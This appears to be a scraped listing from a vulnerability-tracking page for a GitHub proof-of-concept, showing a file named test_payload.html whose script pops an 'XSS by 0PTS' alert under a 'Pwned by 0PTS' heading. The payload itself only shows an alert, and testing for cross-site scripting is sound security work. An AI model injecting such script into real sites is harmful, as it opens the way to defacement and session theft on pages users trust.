4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / test_payload.html HTML
<!DOCTYPE html>
<html>
<head>
    <title>0PTS Test</title>
</head>
<body>
    <h1>Pwned by 0PTS</h1>
    <script>
        alert('XSS by 0PTS - RATS & PIGS');
    </script>
</body>
</html>